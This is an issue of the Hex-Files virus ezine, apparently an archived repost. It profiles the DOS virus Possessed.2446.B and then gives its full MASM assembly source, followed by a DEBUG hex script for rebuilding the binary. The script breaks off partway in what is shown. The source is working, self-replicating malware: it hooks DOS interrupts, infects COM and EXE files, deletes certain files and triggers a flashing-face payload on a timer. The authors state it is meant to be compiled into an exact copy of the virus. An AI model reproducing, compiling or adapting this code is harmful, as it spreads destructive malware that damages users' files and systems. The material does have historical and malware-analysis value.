Copy Link
Add to Bookmark
Report

Hexfiles Issue 2 File 009

eZine's profile picture
Published in 
hexfiles
 · 2 months ago

  
HEX-FILES No. 2 File 009
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Virus: Possessed.2446.B
Alias: Possessed 1.07, Possessed II
Targets: COM, EXE

Resident: Low Memory TSR
MemorySize: 2944 bytes + environment
MemorySelfRec: [0:1EC] <> 0

VirusLength: 2446 bytes
InfectiveLength:
COM: 2446 bytes
EXE: 2446 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: (File[Eof-1067..Eof-1066] = 41h 4bh) and
(File[16..81] = Virus[8..73])
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"C:*.COM", "C:*.EXE" <--- drive letters varies
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"COMMAND.COM"
DisplayedText:
If host program EXEC failed

"POSSESSED! Bwa! ha! ha! ha! ha!"

Payload: Flashing face
PayloadTrigger: After 11 hours if it became resident through COMMAND.COM;
After 3 or 4 hours from other programs


ÄÄ POS2446B.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2446.B
; Alias: Possessed 1.07, Possessed III
; Author: JonJon Gumba
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you will
; use *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original
; virus, that is, compiled by masm 5.0 This can also be compiled
; in a86 4.02 but you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
ExeHeader struc
isExeId dw ?
isMod dw ?
isBlocks dw ?
isRelocItemCt dw ?
isHeaderSize dw ?
isMinAlloc dw ?
isMaxAlloc dw ?
isSs dw ?
isSp dw ?
isCxSum dw ?
isIp dw ?
isCs dw ?
ExeHeader ends

Possessed segment 'code'
assume cs:Possessed, ds:nothing

org 0

MemoryMarkerLoc equ 01ech
SaveSsOnInt21 equ 01f6h
SaveSpOnInt21 equ 01f4h

PossessedEntry:
push es
xor ax,ax
mov es,ax
jmp FirstGenerationEntry

PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: JonJon Gumba of AdU',10,26

isDos:
jmp DosHandler

DosVersion db ?
FirstGenerationFlag db 1
DosInterrupt label dword
DosIntOffset dw ?
DosIntSegment dw ?
ClockInterrupt label dword
ClockIntOffset dw ?
ClockIntSegment dw ?
ErrorIntOffset dw ?
ErrorIntSegment dw ?
VictimAsciizSegment dw ?
VictimAsciizOffset dw ?
Attribute dw ?
Handle dw ?
FileTime dw ?
FileDate dw ?
ComLength dw ?
AllocatedMemory dw ?
Timer dw ?
Hour db ?
ActivateLength db ?
ViruSs dw ?
ViruSp dw ?
ExeSs dw ?
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ?
ExeLengthHi dw ?
Environment dw ?
Psp dw ?

DosHandler:
pushf
cmp ax,4b00h
jne PassToDos
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
mov bx,dx
mov bl,[bx]

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov ComAsciiz,bl
mov ExeAsciiz,bl
mov ah,2fh
call UseDos
push es
push bx
mov ah,1ah
mov dx,offset VirusDta
call UseDos
mov cx,23h
mov dx,offset ComAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
mov dx,offset ExeAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
InfectExecutingProgram:
pop dx
pop ds
mov ah,1ah
call UseDos
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
call SaveRegistersBeforeInfect
jmp PassToDos
InfectOthersFirst:
mov dx,offset VirusDta
add dx,28
mov bx,dx
mov cl,ComAsciiz
mov [bx],cl
mov byte ptr [bx+1],':'
call SaveRegistersBeforeInfect
jmp InfectExecutingProgram

SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect

assume cs:Possessed, ds:nothing

RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret

PassToDos:
popf
jmp DosInterrupt

SetInfect:
mov VictimAsciizSegment,ds
mov VictimAsciizOffset,dx
mov si,dx
add si,2
mov bx,si
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si
inc bx
jmp CheckNextCharOfFileName

CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator

RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters

GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim
mov cx,13
cld
repe movsb
push ds
push dx

assume cs:Possessed, ds:Possessed

push es
pop ds
mov ax,3524h
call UseDos
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos

assume cs:Possessed, ds:nothing

pop dx
pop ds
mov ax,4300h
call UseDos
Relay1:
jc RestoreErrorInterrupt
mov Attribute,cx
mov ax,4301h
mov cx,20h
call UseDos
jc Relay1
mov ax,3d02h
call UseDos
jc Relay1
mov Handle,ax
mov bx,ax
mov ax,5700h
call UseDos
mov FileDate,dx
mov FileTime,cx
mov bx,-2
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h
call UseDos
jc Relay1
EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx
mov bx,Handle
mov ax,4202h
call UseDos
jc Relay2
mov ComLength,ax
call MovePointerBegin
Relay2:
jc Relay3
mov cx,ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh
call UseDos
Relay3:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h
je DoneWithFile
jmp NotInfected

InfectCheckCom:
mov si,cx
sub si,(offset VirusStack-offset FaceData)
js Relay4
cmp word ptr [si],4b41h
je VerifyComInfection
Relay4:
jmp NotInfected

VerifyComInfection:
mov si,16
mov di,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe cmpsw
je DoneWithFile
jmp DeleteFile

assume cs:Possessed, ds:Possessed

DoneWithFile:
push cs
pop ds
mov es,AllocatedMemory
mov ah,49h
call UseDos
mov bx,Handle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h
call UseDos
mov ah,3eh
call UseDos
mov ds,VictimAsciizSegment

assume cs:Possessed, ds:nothing

mov dx,VictimAsciizOffset
mov cx,Attribute
mov ax,4301h
call UseDos
jmp RestoreRegisters

NotInfected:
push es
mov ds,VictimAsciizSegment
mov si,VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1

assume cs:Possessed, ds:Possessed

pop ds
mov al,4
cmp ActivateLength,11
je SetActivateTime
cmp ActivateLength,al
jne SetActivateTime
mov al,3
SetActivateTime:
mov ActivateLength,al
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler
mov di,offset NameofVictim
call Compare
pushf
neg al
call Scrambler
popf
jc CheckDiskSpace
cmp DosVersion,3
jnc SetActivateFromCommand
Relay5:
jmp DoneWithFile
SetActivateFromCommand:
mov ActivateLength,11
jmp EnoughDiskSpace

assume cs:Possessed, ds:nothing

CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2500
jc Relay5
EnoughDiskSpace:
mov bx,Handle
call MovePointerBegin
jc Relay5
mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM'
jne isComFile
jmp isExeFile

Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx

LocComEntry dw ?
LocEndOfFile dw ?

isComFile:
push ds
push ds
mov di,offset SaveVictimCode
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
pop es

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ComLength
cmp ActivateLength,11
jne ComNotCommand
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h) ;ffa3
mov LocComEntry,dx
jmp JumperSet

ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw
mov si,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe movsw
call MovePointerBegin

assume cs:Possessed, ds:nothing

pop ds
mov cx,ComLength
cmp ActivateLength,11
jne NotCommandCom
sub cx,offset VirusStack
NotCommandCom:
xor dx,dx
mov ah,40h
call UseDos
jnc WriteOk
Relay6:
jmp Relay5

WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
jc Relay6
jmp DoneWithFile

DeleteFile:
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile

PixelRow equ Environment+100h
PixelColumn equ Psp+100h

isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt

ShowTime:
popf
mov ax,6
int 10h

assume cs:Possessed, ds:Possessed

push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate

EndFaceData:
pop si
xor al,al
pop cx
loop EraseFace
pop si
ret

assume cs:Possessed, ds:nothing

isExeFile:
mov word ptr [si].isCxSum,1970h
mov ax,[si].isSs
add ax,16
mov ExeSs,ax
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax
PageAligned:
mov bx,512
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack
adc dx,0
jc Relay7
div bx
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx
sub ax,[si].isHeaderSize
sub ax,16
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h
mov bx,Handle
call MovePointerBegin
mov cx,28
xor dx,dx
mov ah,40h
call UseDos

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h
call UseDos
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
Relay7:
jmp DoneWithFile

assume cs:Possessed, ds:nothing

isError:
xor ax,ax
mov es,ax
mov ss,es:SaveSsOnInt21
mov sp,es:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret

UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov es:SaveSpOnInt21,sp
mov es:SaveSsOnInt21,ss
pop ax
pop es
pushf
call DosInterrupt
pop bp
ret

MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret

Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret

Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret

EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h

EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'J'+25h
db 'o'+25h,'n'+25h,'J'+25h,'o'+25h,'n'+25h
db ' '+25h,'G'+25h,'u'+25h,'m'+25h,'b'+25h
db 'a'+25h,' '+25h,'o'+25h,'f'+25h,' '+25h
db 'A'+25h,'d'+25h,'U'+25h,10+25h,26+25h

;----------------------------
;--------------Possessed payload data
;----------------------------
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0

ComAsciiz db 'C:*.COM',0
ExeAsciiz db 'C:*.EXE',0

ExeEntry:
push es
xor ax,ax
mov es,ax
cmp byte ptr es:MemoryMarkerLoc,0
jne ExecuteExeVictim
mov si,100h
jmp ExeNotInMemory

ExecuteExeVictim:
pop es
mov ax,es
add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h

SecondCodeMove:
cld
repe movsb
xor ax,ax
mov es,ax
FirstGenerationEntry:
mov byte ptr es:MemoryMarkerLoc,1
pop ax
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf

assume cs:Possessed, ds:Possessed

SetUpPossessed:
mov ax,sp
sub ax,100h
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax
pop ax
push ds
push es
mov ds,ax
push cs
pop es
mov si,0ah
mov di,offset VirusStack
mov cx,6
cld
repe movsw
mov bx,offset isTerminate
mov ds:[0ah],bx
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId
mov cx,(FaceData-EncryptedPossessedId)
push cx
mov al,25h
call Scrambler
mov di,offset PossessedId
push si
cld
repe movsb
pop si
pop cx
neg al
call Scrambler
mov ax,word ptr ExeEntry
add ax,(3521h-3306h)
int 21h
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,10h
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl
add ax,(3508h-2521h)
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,10h
call UseDos
push cs
pop ds
mov es,Psp
mov ah,49h
call UseDos
mov dx,offset VirusStack
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h
call UseDos
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack
mov di,0ah
mov cx,6
cld
repe movsw
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0
jmp GetReturnCode

NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h
mov [si+8],ax
mov word ptr [si+6],5ch
mov [si+12],ax
mov word ptr [si+10],6ch
mov ax,Environment
mov [si],ax
mov ah,30h
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+03],':'
jne CheckNextChar
mov dx,si
add dx,2
jmp FoundFileName

CheckNextChar:
inc si
loop FindFileName
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz

assume cs:Possessed, ds:nothing

FoundFileName:
cli
mov ViruSs,ss
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam
cmp DosVersion,3
jc OldDos
call UseDos
jmp VictimExecuted

OldDos:
int 21h
VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode
mov dx,offset PossessedId
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh
int 21h
mov ah,4ch
int 21h

NameofVictim db 13 dup (?)

ComEntry:
add si,100h
push es
xor ax,ax
mov es,ax

cmp word ptr es:MemoryMarkerLoc,0
je NotInMemory
pop es
sub si,5ah
mov di,100h
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
mov bx,100h
clc
jmp bx

NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
pop es

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov di,100h
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)
mov DosIntSegment+100h,es
mov DosIntOffset+100h,offset SecondCodeMove+100h
push es
jmp cs:DosInterrupt+100h


SaveVictimCode db 90 dup (?)
VirusStack dw ?
VirusAsciiz db 13 dup (?)
ExecParam dw 7 dup (?)
dontknow db 21 dup (?)
VirusDta db 41 dup (?)

Possessed ends

end PossessedEntry

ÄÄ POS2446B.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


ÄÄ POS2446B.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N POS2446B.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 B4 0B 57 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E
E 0140 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55
E 0150 0A 1A 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20
E 0160 74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48
E 0170 45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A
E 0180 0A 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50
E 0190 75 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61
E 01A0 72 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62
E 01B0 6C 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69
E 01C0 6D 70 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69
E 01D0 6D 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20
E 01E0 62 72 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79
E 01F0 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65
E 0200 20 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74
E 0210 68 69 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A
E 0220 70 65 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75
E 0230 74 65 73 20 74 68 69 73 20 76 69 72 69 69 20 62
E 0240 65 61 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E
E 0250 73 69 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73
E 0260 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A
E 0270 54 68 69 73 20 76 69 72 69 69 20 69 73 20 73 74
E 0280 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61
E 0290 74 69 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65
E 02A0 73 65 61 72 63 68 20 70 75 72 70 6F 73 65 73 20
E 02B0 6F 6E 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07
E 02C0 01 B4 09 CD 21 B4 4C CD 21 06 33 C0 8E C0 E9 52
E 02D0 07 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61
E 02E0 21 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61
E 02F0 21 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F
E 0300 6E 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64
E 0310 55 0A 1A EB 37 90 06 00 4A 00 C5 0D 2E 03 C5 0D
E 0320 C8 04 91 0E 08 04 35 05 20 00 05 00 C9 21 68 24
E 0330 C9 01 3A 0F A9 00 03 04 08 04 0A 06 00 00 00 00
E 0340 00 00 00 00 00 00 00 00 7B 0E 81 0E 9C 3D 00 4B
E 0350 75 7C 1E 06 56 57 50 53 51 52 8B DA 8A 1F 0E 1F
E 0360 88 1E 08 07 88 1E 10 07 B4 2F E8 37 04 06 53 B4
E 0370 1A BA C0 09 E8 2D 04 B9 23 00 BA 08 07 B4 4E E8
E 0380 22 04 73 1F BA 10 07 B4 4E E8 18 04 73 15 5A 1F
E 0390 B4 1A E8 0F 04 5A 59 5B 58 5F 5E 07 1F E8 1A 00
E 03A0 EB 2C 90 BA C0 09 83 C2 1C 8B DA 8A 0E 08 07 88
E 03B0 0F C6 47 01 3A E8 02 00 EB D4 1E 06 56 57 50 53
E 03C0 51 52 EB 10 90 5A 59 5B 58 5F 5E 07 1F C3 9D 2E
E 03D0 FF 2E 4F 00 2E 8C 1E 5B 00 2E 89 16 5D 00 8B F2
E 03E0 83 C6 02 8B DE 80 3C 5C 75 06 8B DE 43 EB 06 90
E 03F0 80 3C 00 74 15 46 EB ED B8 24 25 2E 8B 16 57 00
E 0400 2E 8E 1E 59 00 E8 9C 03 EB BB 8B F3 0E 07 BF DE
E 0410 08 B9 0D 00 FC F3 A4 1E 52 06 1F B8 24 35 E8 83
E 0420 03 8C 06 59 00 89 1E 57 00 B8 24 25 BA C8 04 E8
E 0430 72 03 5A 1F B8 00 43 E8 6A 03 72 BC 2E 89 0E 5F
E 0440 00 B8 01 43 B9 20 00 E8 5A 03 72 EE B8 02 3D E8
E 0450 52 03 72 E6 2E A3 61 00 8B D8 B8 00 57 E8 44 03
E 0460 2E 89 16 65 00 2E 89 0E 63 00 BB FE FF B4 48 E8
E 0470 32 03 73 07 B4 48 E8 2B 03 72 BF 2E A3 69 00 33
E 0480 C9 8B D1 2E 8B 1E 61 00 B8 02 42 E8 16 03 72 07
E 0490 2E A3 67 00 E8 28 03 72 11 2E 8B 0E 67 00 33 D2
E 04A0 2E 8E 1E 69 00 B4 3F E8 FA 02 72 36 0E 07 33 F6
E 04B0 81 3C 4D 5A 75 0A 81 7C 12 70 19 74 25 EB 5C 90
E 04C0 8B F1 81 EE 2B 04 78 06 81 3C 41 4B 74 03 EB 4B
E 04D0 90 BE 10 00 BF 08 00 B9 21 00 FC F3 A7 74 03 E9
E 04E0 49 01 0E 1F 8E 06 69 00 B4 49 E8 B7 02 8B 1E 61
E 04F0 00 8B 16 65 00 8B 0E 63 00 B8 01 57 E8 A5 02 B4
E 0500 3E E8 A0 02 8E 1E 5B 00 2E 8B 16 5D 00 2E 8B 0E
E 0510 5F 00 B8 01 43 E8 8C 02 E9 AA FE 06 2E 8E 1E 5B
E 0520 00 2E 8B 36 5D 00 8A 14 80 EA 40 1F B0 04 80 3E
E 0530 6E 00 0B 74 08 38 06 6E 00 75 02 B0 03 A2 6E 00
E 0540 BE 16 05 B9 0B 00 B0 17 E8 7F 02 BF DE 08 E8 83
E 0550 02 9C F6 D8 E8 73 02 9D 72 12 80 3E 4D 00 03 73
E 0560 03 E9 7E FF C6 06 6E 00 0B EB 15 90 B4 36 E8 33
E 0570 02 33 D2 F7 E3 F7 E1 0B D2 75 05 3D C4 09 72 E1
E 0580 2E 8B 1E 61 00 E8 37 02 72 D7 2E 8E 1E 69 00 33
E 0590 F6 81 3C 4D 5A 75 13 E9 40 01 2E 8B 1E 0C 01 2E
E 05A0 8B 36 0E 01 FF E3 B4 0B 57 0B 1E 1E BF 34 09 B9
E 05B0 2D 00 FC F3 A5 07 0E 1F 8B 16 67 00 80 3E 6E 00
E 05C0 0B 75 0F 89 16 DF 02 81 EA A3 FF 89 16 DD 02 EB
E 05D0 13 90 52 81 C2 EB 09 89 16 DD 02 5A 81 C2 8E 09
E 05E0 89 16 DF 02 BE D1 02 33 FF B9 08 00 FC F3 A5 BE
E 05F0 08 00 B9 21 00 FC F3 A5 E8 C4 01 1F 2E 8B 0E 67
E 0600 00 2E 80 3E 6E 00 0B 75 04 81 E9 8E 09 33 D2 B4
E 0610 40 E8 90 01 73 03 E9 48 FF 0E 1F BA 00 00 B9 8E
E 0620 09 B4 40 E8 7E 01 72 EE E9 B7 FE 2E 8E 1E 5B 00
E 0630 2E 8B 16 5D 00 B4 41 E8 6A 01 E9 A5 FE 9C 2E FF
E 0640 06 6B 00 75 07 2E FE 0E 6D 00 74 06 9D 2E FF 2E
E 0650 53 00 9D B8 06 00 CD 10 0E 1F 33 DB 33 D2 BE 63
E 0660 05 C7 06 7F 01 C8 00 C7 06 81 01 00 00 E8 3E 00
